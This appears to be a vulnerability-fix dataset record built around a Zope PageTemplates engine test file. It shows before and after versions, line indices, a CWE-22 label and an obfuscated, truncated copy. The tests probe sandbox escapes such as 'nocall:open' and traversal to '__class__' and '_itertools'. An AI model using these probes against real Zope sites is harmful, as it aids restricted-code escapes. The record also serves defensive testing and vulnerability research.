return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_30 = VAR_12.pop()
if VAR_30 == '_':
warnings.warn('Traversing to the VAR_30 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif VAR_30.startswith('_'):
raise NotFound(VAR_30)
if ITraversable.providedBy(VAR_10):
VAR_10 = getattr(VAR_10, VAR_9.traverse_method)(VAR_30)
else:
VAR_10 = traversePathElement(VAR_10, VAR_30, VAR_12,
VAR_11=request)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_28 = self.secured.get(VAR_18.id)
if VAR_28 is not None:
return Symbol(VAR_28)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_30: FUNC_0(builtin) for (VAR_30, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_29 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_29, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
| [
2,
5,
11,
27,
30,
31,
33,
44,
45,
48,
49,
52,
54,
58,
61,
69,
71,
74,
77,
80,
84,
86,
87,
90,
92,
95,
97,
100,
104,
106,
107,
110,
114,
115,
120,
121,
124,
125,
128,
129,
138,
143,
145,
146,
150,
151,
153,
154,
158,
162,
163,
165,
166,
168,
170,
171,
172,
173,
174,
175,
176,
180,
185,
186,
195,
196,
199,
202,
214,
215,
220,
221,
223,
224,
227,
228,
230,
231,
234,
1,
179,
180,
181,
182,
57
] | [
2,
6,
12,
28,
31,
32,
34,
45,
46,
49,
50,
53,
55,
59,
62,
65,
72,
78,
80,
83,
86,
89,
93,
95,
96,
99,
101,
104,
106,
109,
113,
115,
116,
119,
123,
124,
129,
130,
133,
134,
137,
138,
147,
152,
154,
155,
159,
160,
162,
163,
167,
171,
172,
174,
175,
177,
179,
180,
181,
182,
183,
184,
185,
189,
194,
195,
204,
205,
208,
211,
223,
224,
229,
230,
232,
233,
236,
237,
239,
240,
243,
1,
188,
189,
190,
191,
58
] |
0CWE-22
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
# Traversing to the name `_` will raise a DeprecationWarning
# because it will go away in Zope 6.
ec = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
def test_underscore_traversal(self):
# Prevent traversal to names starting with an underscore (_)
ec = self._makeContext()
with self.assertRaises(NotFound):
ec.evaluate("context/__class__")
with self.assertRaises(NotFound):
ec.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
ec.evaluate("random/_itertools/repeat/foobar")
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
from zope.location.interfaces import LocationError
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
# Traversing to the name `_` will raise a DeprecationWarning
# because it will go away in Zope 6.
ec = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
def test_underscore_traversal(self):
# Prevent traversal to names starting with an underscore (_)
ec = self._makeContext()
with self.assertRaises(NotFound):
ec.evaluate("context/__class__")
with self.assertRaises((NotFound, LocationError)):
ec.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises((NotFound, LocationError)):
ec.evaluate("random/_itertools/repeat/foobar")
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| path_disclosure | {
"code": [
" with self.assertRaises(NotFound):",
" with self.assertRaises(NotFound):"
],
"line_no": [
236,
239
]
} | {
"code": [
" with self.assertRaises((NotFound, LocationError)):",
" with self.assertRaises((NotFound, LocationError)):"
],
"line_no": [
237,
240
]
} | import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_41(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
